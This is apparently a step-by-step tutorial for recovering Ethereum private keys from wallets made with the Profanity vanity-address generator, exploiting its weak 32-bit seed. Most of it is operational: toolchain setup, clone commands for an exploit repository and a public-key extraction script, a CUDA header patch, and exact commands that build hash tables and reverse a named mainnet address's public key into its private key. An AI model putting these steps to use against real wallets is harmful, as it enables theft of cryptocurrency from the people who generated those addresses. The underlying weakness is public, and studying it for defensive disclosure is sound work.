Profanity use the random device (std::random_device in c++) to generate a seed. Profanity seeded the CPRNG with an unsigned integer, only 2^32 (about 4.3 billion) possible seed values. Since there are only 2^32 possible initial key, it is possible to crack the private key from any public key generated by Profanity.
Some articles that have discussed this:
Previously, reverse code was originaly explained by @rebryk in a tweet and article. The code was developed by Profanity Dev in C++ and edited by @rebryk run on MacOS.
I suggest you use a GPU that has more than 8GB of VRAM, in this case I used Nvidia GeForce RTX 3080 Ti (12108 VRAM).
If you use VGA from NVIDIA, first download and install NVIDIA CUDA here.
Once installed , by default it will be in the path: (my CUDA has version v11.7) C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.7
You have to install gcc but be aware if you are using windows x64 you have to install gcc version x86_64. I suggest you install via MSYS2.
in MSYS2 environment (cli) run command:
$ pacman -S mingw-w64-x86_64-gcc
the command above is different from the default on the MSYS2 website because it doesn't install the ucrt version, and after that install make on cli environment
$ pacman -S make
After that, add the bin directory to the Windows Environment Variable
On my computer, I installed MSYS2 in the C:\ directory :
C:\msys64\mingw64\bin
C:\msys64\usr\bin
Make sure the folder is not empty, and has been added to the environment variable.
After following the installation on the MSYS2 website, open CMD and type "gcc" if the response is gcc: fatal error: no input files it means you have successfully installed the software.
Because I have made a script to change Txhash to publicKey with node js, so this step is necessary. You can download Node JS here.
After installing Node JS you have to install Yarn by following the steps.
Please download OpenCL.dll (please search for yourself on Google) and extract it. I think OpenCL works fine on Intel processors, I havent tested it on AMD yet.
First, clone the script to change txHash to publicKey
$ git clone https://github.com/tinwaninja/get_public_key_eth
$ cd get_public_key_eth
$ yarn install
For example, in this case, there is an address that was previously exploited by the hacker 0xFffFffFB5c79E42fA9Bb34f80A701872d5FA75e5
To get the publicKey from that address, it will use transaction
https://etherscan.io/tx/0x4a61da70eb0e80cf54450240e1b44c5c38d9c57dcc572099bd6599694864ce87 (any out transaction)
so open index.js and change line 5 and enter the transaction hash, you need to register infura.io to get the key to access the rpc ethereum mainnet, after getting the infura key, edit the 4th line in the index.js script, after saving it then run:
$ node index.js
The result should be as follows:
address: 0xFffFffFB5c79E42fA9Bb34f80A701872d5FA75e5
publicKey: 0xab98c8dfcfa1655da5265550c34196442a5ac44882ebece9d83b817dda822a5ff040fb786d187ed0fb81d1031addadecdb97a2899c02a11f1ffd413ed465cd85
Please note that the publicKey can only be extracted on transactions EIP-1559, you can read the details of the Ethereum update in this article (meaning the transaction must be more than August 5th, 2021)
Clone script reverse profanity for windows
$ git clone https://github.com/tinwaninja/profanity_exploit_windows
$ cd profanity_exploit_windows
Open and edit Makefile see on line 13
C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.7\include
if the CUDA\include software directory on your computer is located differently, please adjust it.
After that we need to slightly change the default file from CUDA software, open file C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.7\include\CL\cl_ext.h and add this script at the end of the line in the file (need Administrator permission):
/*********************************
cl_amd_device_memory_flags *
*********************************/
#define cl_amd_device_memory_flags 1
#define CL_MEM_USE_PERSISTENT_MEM_AMD (1 << 6) // Alloc from GPU's CPU visible heap
/* cl_device_info */
#define CL_DEVICE_MAX_ATOMIC_COUNTERS_EXT 0x4032
/*********************************
cl_amd_device_attribute_query *
*********************************/
#define CL_DEVICE_PROFILING_TIMER_OFFSET_AMD 0x4036
#define CL_DEVICE_TOPOLOGY_AMD 0x4037
#define CL_DEVICE_BOARD_NAME_AMD 0x4038
#define CL_DEVICE_GLOBAL_FREE_MEMORY_AMD 0x4039
#define CL_DEVICE_SIMD_PER_COMPUTE_UNIT_AMD 0x4040
#define CL_DEVICE_SIMD_WIDTH_AMD 0x4041
#define CL_DEVICE_SIMD_INSTRUCTION_WIDTH_AMD 0x4042
#define CL_DEVICE_WAVEFRONT_WIDTH_AMD 0x4043
#define CL_DEVICE_GLOBAL_MEM_CHANNELS_AMD 0x4044
#define CL_DEVICE_GLOBAL_MEM_CHANNEL_BANKS_AMD 0x4045
#define CL_DEVICE_GLOBAL_MEM_CHANNEL_BANK_WIDTH_AMD 0x4046
#define CL_DEVICE_LOCAL_MEM_SIZE_PER_COMPUTE_UNIT_AMD 0x4047
#define CL_DEVICE_LOCAL_MEM_BANKS_AMD 0x4048
#define CL_DEVICE_THREAD_TRACE_SUPPORTED_AMD 0x4049
#define CL_DEVICE_GFXIP_MAJOR_AMD 0x404A
#define CL_DEVICE_GFXIP_MINOR_AMD 0x404B
#define CL_DEVICE_AVAILABLE_ASYNC_QUEUES_AMD 0x404C
typedef union
{
struct { cl_uint type; cl_uint data[5]; } raw;
struct { cl_uint type; cl_char unused[17]; cl_char bus; cl_char device; cl_char function; } pcie;
} cl_device_topology_amd;
#define CL_DEVICE_TOPOLOGY_TYPE_PCIE_AMD 1After that we can make the script executable, run this command in the profanity_exploit_windows directory:
$ make
If there is an error below : (just ignore it)
C:/msys64/mingw64/bin/../lib/gcc/x86_64-w64-mingw32/12.2.0/../../../../x86_64-w64-mingw32/bin/ld.exe: Dispatcher.o:Dispatcher.cpp:(.text+0x1b3): undefined reference to `clWaitForEvents'
.....
C:/msys64/mingw64/bin/../lib/gcc/x86_64-w64-mingw32/12.2.0/../../../../x86_64-w64-mingw32/bin/ld.exe: profanity.o:profanity.cpp:(.text.startup+0x1aa9): undefined reference to `clCreateProgramWithBinary'
then still run this command in the profanity_exploit_windows directory:
$ g++ Dispatcher.o Mode.o precomp.o profanity.o SpeedSample.o -s -mcmodel=large -o profanity.x64 "C:\Users\ETH\Downloads\OpenCL.dll"
C:\Users\ETH\Downloads\OpenCL.dll please change it to your OpenCL.dll download location
After creating the executable file, run this command in the profanity_exploit_windows directory:
$ profanity.x64 --help
If a list of helpers from Profanity has appeared, it means that the software is ready to use.
The important part to do from this stage is create a Hashfile, there are 8 files and each file will be around 6 GB in size.
Create a cache folder inside the profanity_exploit_windows folder (IMPORTANT)
After creating the cache folder run the following command (maybe it will wait a few hours until the Hashfile is done) :
$ profanity.x64 --hashTable --steps 20000 --target 0xab98c8dfcfa1655da5265550c34196442a5ac44882ebece9d83b817dda822a5ff040fb786d187ed0fb81d1031addadecdb97a2899c02a11f1ffd413ed465cd85
if error => error: bad arguments, try again :< you can replace --hashTable with -h so the command will be like this:
$ profanity.x64 -h --steps 20000 --target 0xab98c8dfcfa1655da5265550c34196442a5ac44882ebece9d83b817dda822a5ff040fb786d187ed0fb81d1031addadecdb97a2899c02a11f1ffd413ed465cd85
(optional) if your computer has several GPU options, then you can skip and focus on the GPU that will be used. For example, on my computer there are 5 GPU options, and I only want to use the NVIDIA GeForce RTX 3080 Ti, so I need to skip the other options.
So I run the next command need to add --skip 1 --skip 2 --skip 3 --skip 4 at the end of the command line, example :
$ profanity.x64 --hashTable --steps 20000 --target 0xab98c8dfcfa1655da5265550c34196442a5ac44882ebece9d83b817dda822a5ff040fb786d187ed0fb81d1031addadecdb97a2899c02a11f1ffd413ed465cd85 --skip 1 --skip 2 --skip 3 --skip 4
Make sure there are 8 Hashfiles (0.bin until 7.bin) in the cache folder (IMPORTANT)
To get a privateKey from a reverse publicKey, run the following command:
$ profanity.x64 --reverse --steps 20000 --cache --target 0xab98c8dfcfa1655da5265550c34196442a5ac44882ebece9d83b817dda822a5ff040fb786d187ed0fb81d1031addadecdb97a2899c02a11f1ffd413ed465cd85 --skip 1 --skip 2 --skip 3 --skip 4
When the script has finished running, it should get a privateKey that looks like this image:
I have tried at another address on the Goerli network with an address that has a prefix of 0x00000000000 (11 digits of zero) the result is the same, it can be found in less than 15 minutes.